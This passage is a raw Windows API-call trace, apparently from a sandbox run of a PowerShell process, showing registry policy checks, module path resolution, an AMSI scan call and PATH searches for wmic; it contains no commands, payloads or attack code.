phkResult=0x7c0d9b4*=0x7d8) returned 0x0 [0248.112] RegQueryValueExW (in: hKey=0x7d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x7c0d9d0, lpData=0x0, lpcbData=0x7c0d9cc*=0x0 | out: lpType=0x7c0d9d0*=0x0, lpData=0x0, lpcbData=0x7c0d9cc*=0x0) returned 0x2 [0248.112] RegCloseKey (hKey=0x7d8) returned 0x0 [0248.113] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0248.113] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49 [0248.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0d9a0) returned 1 [0248.114] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psm1"), fInfoLevelId=0x0, lpFileInformation=0x4baa584 | out: lpFileInformation=0x4baa584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb4)) returned 1 [0248.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0d99c) returned 1 [0248.114] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0248.114] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49 [0248.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0d960) returned 1 [0248.114] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psm1"), fInfoLevelId=0x0, lpFileInformation=0x7c0d9dc | out: lpFileInformation=0x7c0d9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb4)) returned 1 [0248.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0d95c) returned 1 [0248.114] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0248.114] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49 [0248.116] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0d924 | out: phkResult=0x7c0d924*=0x0) returned 0x2 [0248.117] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0d924 | out: phkResult=0x7c0d924*=0x0) returned 0x2 [0248.118] GetEnvironmentVariableW (in: lpName="PSExecutionPolicyPreference", lpBuffer=0x7c0d7dc, nSize=0xc3 | out: lpBuffer="ꨰҺ^^") returned 0x0 [0248.119] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0d960 | out: phkResult=0x7c0d960*=0x0) returned 0x2 [0248.120] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0d960 | out: phkResult=0x7c0d960*=0x7d8) returned 0x0 [0248.121] RegQueryValueExW (in: hKey=0x7d8, lpValueName="ExecutionPolicy", lpReserved=0x0, lpType=0x7c0d980, lpData=0x0, lpcbData=0x7c0d97c*=0x0 | out: lpType=0x7c0d980*=0x0, lpData=0x0, lpcbData=0x7c0d97c*=0x0) returned 0x2 [0248.121] RegCloseKey (hKey=0x7d8) returned 0x0 [0248.121] CoTaskMemAlloc (cb=0x20c) returned 0x7e17300 [0248.122] GetSystemDirectoryW (in: lpBuffer=0x7e17300, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0248.122] CoTaskMemFree (pv=0x7e17300) [0248.122] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0248.122] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0248.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0d8e0) returned 1 [0248.122] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x7c0d95c | out: lpFileInformation=0x7c0d95c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0248.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0d8dc) returned 1 [0248.122] GetSystemInfo (in: lpSystemInfo=0x7c0d990 | out: lpSystemInfo=0x7c0d990*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0248.123] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0d920 | out: phkResult=0x7c0d920*=0x7d8) returned 0x0 [0248.124] RegQueryValueExW (in: hKey=0x7d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x7c0d93c, lpData=0x0, lpcbData=0x7c0d938*=0x0 | out: lpType=0x7c0d93c*=0x0, lpData=0x0, lpcbData=0x7c0d938*=0x0) returned 0x2 [0248.124] RegCloseKey (hKey=0x7d8) returned 0x0 [0248.124] CoTaskMemAlloc (cb=0x94) returned 0x851700 [0248.124] IdentifyCodeAuthzLevelW () returned 0x1 [0248.285] CoTaskMemFree (pv=0x851700) [0248.285] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0248.285] CloseCodeAuthzLevel () returned 0x1 [0248.291] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x7c0d9c8, dwReserved=0x0 | out: ppSM=0x7c0d9c8*=0x8cc6d0) returned 0x0 [0248.292] IUnknown:QueryInterface (in: This=0x8cc6d0, riid=0x73ad3e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7c0d480 | out: ppvObject=0x7c0d480*=0x8cc6dc) returned 0x0 [0248.292] IUnknown:QueryInterface (in: This=0x8cc6dc, riid=0x73b00328*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x7c0d43c | out: ppvObject=0x7c0d43c*=0x0) returned 0x80004002 [0248.292] IUnknown:QueryInterface (in: This=0x8cc6dc, riid=0x73b003bc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x7c0d25c | out: ppvObject=0x7c0d25c*=0x0) returned 0x80004002 [0248.292] IUnknown:QueryInterface (in: This=0x8cc6d0, riid=0x73b00490*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x7c0d034 | out: ppvObject=0x7c0d034*=0x0) returned 0x80004002 [0248.292] IUnknown:AddRef (This=0x8cc6dc) returned 0x3 [0248.292] IUnknown:QueryInterface (in: This=0x8cc6dc, riid=0x73b00074*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x7c0cd94 | out: ppvObject=0x7c0cd94*=0x0) returned 0x80004002 [0248.292] IUnknown:QueryInterface (in: This=0x8cc6dc, riid=0x73afffc8*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x7c0cd44 | out: ppvObject=0x7c0cd44*=0x0) returned 0x80004002 [0248.292] IUnknown:QueryInterface (in: This=0x8cc6dc, riid=0x73a47604*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7c0cd50 | out: ppvObject=0x7c0cd50*=0x0) returned 0x80004002 [0248.292] CoGetContextToken (in: pToken=0x7c0cdb0 | out: pToken=0x7c0cdb0) returned 0x0 [0248.292] CObjectContext::QueryInterface () returned 0x0 [0248.292] CObjectContext::GetCurrentApartmentType () returned 0x0 [0248.293] Release () returned 0x0 [0248.293] CoGetObjectContext (in: riid=0x73ad3e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x87ab74 | out: ppv=0x87ab74*=0x846b48) returned 0x0 [0248.293] CoGetContextToken (in: pToken=0x7c0d1b8 | out: pToken=0x7c0d1b8) returned 0x0 [0248.293] IUnknown:QueryInterface (in: This=0x8cc6dc, riid=0x73b002b4*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7c0d244 | out: ppvObject=0x7c0d244*=0x0) returned 0x80004002 [0248.293] IUnknown:Release (This=0x8cc6dc) returned 0x2 [0248.293] IUnknown:Release (This=0x8cc6d0) returned 0x1 [0248.293] CoGetContextToken (in: pToken=0x7c0d820 | out: pToken=0x7c0d820) returned 0x0 [0248.294] CoGetContextToken (in: pToken=0x7c0d780 | out: pToken=0x7c0d780) returned 0x0 [0248.294] IUnknown:QueryInterface (in: This=0x8cc6dc, riid=0x7c0d850*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x7c0d84c | out: ppvObject=0x7c0d84c*=0x8cc6d0) returned 0x0 [0248.294] IUnknown:AddRef (This=0x8cc6d0) returned 0x3 [0248.294] IUnknown:Release (This=0x8cc6d0) returned 0x2 [0248.296] IInternetSecurityManager:MapUrlToZone (in: This=0x8cc6d0, pwszUrl="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", pdwZone=0x7c0da0c, dwFlags=0x1000 | out: pdwZone=0x7c0da0c*=0x0) returned 0x0 [0248.313] CoGetContextToken (in: pToken=0x7c0d888 | out: pToken=0x7c0d888) returned 0x0 [0248.313] IUnknown:Release (This=0x8cc6dc) returned 0x1 [0248.313] IUnknown:Release (This=0x8cc6d0) returned 0x0 [0248.313] IUnknown:Release (This=0x846b48) returned 0x0 [0248.589] EtwEventWriteTransfer (RegHandle=0x818fa8, EventDescriptor=0x2e, ActivityId=0x7c0eca8, RelatedActivityId=0x7c0ec58, UserDataCount=0x0, UserData=0x3) returned 0x0 [0248.719] SetEvent (hEvent=0x6ac) returned 1 [0248.802] CoWaitForMultipleHandles (dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x7c0ef5c*=0x6b4, lpdwindex=0x7c0ed7c) Thread: id = 74 os_tid = 0x1028 Thread: id = 75 os_tid = 0x310 Thread: id = 76 os_tid = 0x3cc [0249.957] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0249.957] RoInitialize () returned 0x1 [0249.957] RoUninitialize () returned 0x0 [0249.958] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0249.963] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0250.008] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x147c33b1, Data2=0x615d, Data3=0x4a4f, Data4=([0]=0xad, [1]=0xc8, [2]=0xe2, [3]=0x33, [4]=0x66, [5]=0x6a, [6]=0x4, [7]=0x12))) returned 0x0 [0250.049] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=34508386812) returned 1 [0250.049] AmsiOpenSession () returned 0x0 [0250.049] AmsiScanString () returned 0x80070015 [0250.250] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=34528468046) returned 1 [0250.265] EtwEventRegister (in: ProviderId=0x4d9258c, EnableCallback=0x4532ef6, CallbackContext=0x0, RegHandle=0x4d92568 | out: RegHandle=0x4d92568) returned 0x0 [0250.265] EtwEventSetInformation (RegHandle=0x6deba98, InformationClass=0x78, EventInformation=0x2, InformationLength=0x4d92538) returned 0x0 [0250.266] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0ec10, nSize=0x80 | out: lpBuffer="㼧က澪스澵\x01耀哔玥㼧\x02") returned 0x0 [0250.271] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0250.271] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0250.271] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0250.271] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0250.271] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0250.271] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0250.402] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e818, nSize=0x80 | out: lpBuffer="錧犚巜әဨ֓") returned 0x0 [0250.405] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e734, nSize=0x80 | out: lpBuffer="") returned 0xbc [0250.405] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0250.407] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0250.428] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0250.435] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0250.438] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x104, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0250.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0250.438] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0250.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0250.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0250.439] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0250.439] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0250.439] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0250.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0250.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0250.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x8b0df40, nSize=0xbc | out: lpBuffer="抈琉") returned 0x0 [0250.456] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0250.456] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0250.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0250.456] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0250.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0250.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0250.456] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0250.456] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0250.457] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0250.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0250.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0250.457] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0250.457] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0250.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0250.457] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0250.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0250.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0250.458] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0250.458] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0250.458] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0250.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0250.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0250.458] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0250.458] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0250.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0250.458] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), 